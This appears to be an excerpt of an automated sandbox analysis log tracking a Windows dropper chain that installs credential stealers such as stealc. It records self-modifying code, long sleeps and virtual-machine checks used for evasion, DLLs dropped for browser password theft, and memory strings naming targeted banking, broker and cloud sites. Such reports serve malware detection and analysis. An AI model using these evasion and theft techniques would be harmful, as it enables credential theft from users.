Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: DFAB5F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 26EADF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 420C94 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 26C69A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 432AF4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 4AAB5F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Special instruction interceptor: First address: D21B9F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Special instruction interceptor: First address: ECE6D1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Special instruction interceptor: First address: F60A79 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: 15A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: 3160000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Memory allocated: 3070000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 28A0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2A90000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 29D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory allocated: 2820000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory allocated: 29B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Memory allocated: 49B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Memory allocated: 3120000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Memory allocated: 31B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Memory allocated: 51B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Memory allocated: 1390000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Memory allocated: 2E90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Memory allocated: 2D70000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory allocated: DF0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory allocated: 28A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Memory allocated: 26B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2AF0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2C80000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 4C80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Memory allocated: B60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Memory allocated: 23B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Memory allocated: 43B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory allocated: 2600000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory allocated: 2820000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Memory allocated: 4820000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory allocated: 1320000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory allocated: 2D20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Memory allocated: 4D20000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 11A0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2D20000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2AD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05580C46 rdtsc 0_2_05580C46
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 443
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 401
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 421
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 414
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 445
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 401
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Window / User API: threadDelayed 819
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Window / User API: threadDelayed 488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 1796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 3333
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Window / User API: threadDelayed 2376
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Window / User API: threadDelayed 1892
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\Microsoft-Edge[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\neon[1].exe
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000356001\neon.exe
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\NetSup_Buil2d.exe
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000355001\3ab68b6f1f.exe
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000357001\Microsoft-Edge.exe
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API coverage: 9.8 %
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4904 Thread sleep count: 259 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4904 Thread sleep time: -518259s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1976 Thread sleep count: 443 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1976 Thread sleep time: -886443s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2724 Thread sleep count: 401 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2724 Thread sleep time: -802401s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3524 Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4776 Thread sleep count: 161 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4776 Thread sleep time: -4830000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 616 Thread sleep count: 421 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 616 Thread sleep time: -842421s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1176 Thread sleep count: 414 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1176 Thread sleep time: -828414s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5632 Thread sleep count: 445 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5632 Thread sleep time: -890445s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2196 Thread sleep time: -1080000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5512 Thread sleep count: 401 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5512 Thread sleep time: -802401s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4776 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe TID: 5256 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1404 Thread sleep count: 288 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1404 Thread sleep count: 207 > 30
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe TID: 3080 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe TID: 3212 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe TID: 2912 Thread sleep count: 819 > 30
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe TID: 2912 Thread sleep count: 488 > 30
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe TID: 3840 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe TID: 5040 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe TID: 5692 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe TID: 5760 Thread sleep count: 52 > 30
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe TID: 5760 Thread sleep time: -312000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6288 Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe TID: 2268 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe TID: 2168 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe TID: 1780 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe TID: 6516 Thread sleep count: 302 > 30
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe TID: 3264 Thread sleep count: 167 > 30
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe TID: 3544 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3748 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe TID: 6064 Thread sleep count: 74 > 30
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe TID: 6064 Thread sleep time: -444000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041B6EA FindFirstFileExW, 15_2_0041B6EA
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe File opened: C:\Users\user\AppData\Local\Temp
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: needmoney.exe, 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000000.2988347504.0000000000401000.00000020.00000001.01000000.00000019.sdmp Binary or memory string: ParallelsVirtualMachine
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: needmoney.exe, 00000018.00000000.2908554438.0000000000401000.00000020.00000001.01000000.00000013.sdmp Binary or memory string: QEMUU
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: svchost015.exe, 0000001E.00000002.3442582690.0000000027040000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: axplong.exe, 00000006.00000002.3518419435.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000017.00000002.3070584798.000000000104F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001E.00000002.3376541999.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: svchost015.exe, 0000001E.00000002.3442582690.0000000027040000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: penis.exe, 00000019.00000002.2964689421.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \qemu-ga.exe@\
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: axplong.exe, 00000006.00000002.3526057863.0000000005960000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IsVirtualMachine
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: penis.exe, 00000019.00000002.2964689421.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \qemu-ga.exe
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: svchost015.exe, 0000001E.00000002.3376541999.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: RegAsm.exe, 0000001F.00000002.3201717209.0000000003263000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: axplong.exe, axplong.exe, 00000006.00000002.3515196648.0000000000405000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: svchost015.exe, 0000001E.00000002.3442582690.0000000027040000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Nework.exe, 00000012.00000002.2833088082.000000000176B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{5)
Source: stealc_default2.exe, 00000017.00000003.2938911781.00000000274BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
